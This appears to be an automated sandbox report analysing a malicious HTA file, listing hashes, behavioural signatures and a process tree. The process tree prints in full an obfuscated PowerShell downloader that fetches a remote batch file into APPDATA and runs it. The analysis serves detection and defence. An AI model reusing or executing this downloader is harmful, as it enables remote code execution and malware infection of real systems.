Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
30/05/2024, 07:29
Static task
static1
Behavioral task
behavioral1
Sample
mine.hta
Resource
win7-20240508-en
7 signatures
150 seconds
General
-
Target
mine.hta
-
Size
48KB
-
MD5
8ec81411709c0d3ca73859814204cd71
-
SHA1
7da6542e29c888d65a857cf5876ed8e9e6524510
-
SHA256
6840b6d84f7c7190424fd465e466e2477e7c8a781457e2c6dcd523df498cea3d
-
SHA512
ece006bb69841cf02d64c95c0534376934fa073b89eab8f85cc3323f647f1a326198d56cad9666d5b6152e763e2859e945e8794a877c75808f224b27201eec14
-
SSDEEP
768:SOLDbrv8XXl7qCk0BU6zoWvXqfM0JYJ4Tpdsfq0H5wj/:SObstqCdoWvXqfM0JY40Kj
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2640 powershell.exe 4 2640 powershell.exe -
pid Process 2640 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2640 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2128 wrote to memory of 2640 2128 mshta.exe 28 PID 2128 wrote to memory of 2640 2128 mshta.exe 28 PID 2128 wrote to memory of 2640 2128 mshta.exe 28 PID 2128 wrote to memory of 2640 2128 mshta.exe 28
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\mine.hta"1⤵
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2128 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function pYUxYe($YX, $ed){[IO.File]::WriteAllBytes($YX, $ed)};function eYJrvvozw($YX){if($YX.EndsWith((atHcQU @(22670,22724,22732,22732))) -eq $True){Start-Process (atHcQU @(22738,22741,22734,22724,22732,22732,22675,22674,22670,22725,22744,22725)) $YX}else{Start-Process $YX}};function QJVAx($F){$J = New-Object (atHcQU @(22702,22725,22740,22670,22711,22725,22722,22691,22732,22729,22725,22734,22740));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$ed = $J.DownloadData($F);return $ed};function atHcQU($Z){$h=22624;$OK=$Null;foreach($Pw in $Z){$OK+=[char]($Pw-$h)};return $OK};function ROmYsTcn(){$nmYSjx = $env:APPDATA + '\';$JkqUaMTnM = QJVAx (atHcQU @(22728,22740,22740,22736,22739,22682,22671,22671,22743,22721,22732,22732,22677,22740,22727,22728,22726,22678,22726,22724,22727,22670,22721,22736,22729,22670,22735,22736,22725,22734,22739,22735,22741,22738,22723,22725,22739,22721,22721,22739,22670,22735,22738,22727,22671,22714,22703,22724,22723,22726,22702,22741,22735,22671,22733,22745,22744,22743,22738,22677,22723,22732,22729,22670,22722,22721,22740));$lVBjIvqD = $nmYSjx + 'myxwr5cli.bat';pYUxYe $lVBjIvqD $JkqUaMTnM;eYJrvvozw $lVBjIvqD;;;;}ROmYsTcn;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2640
-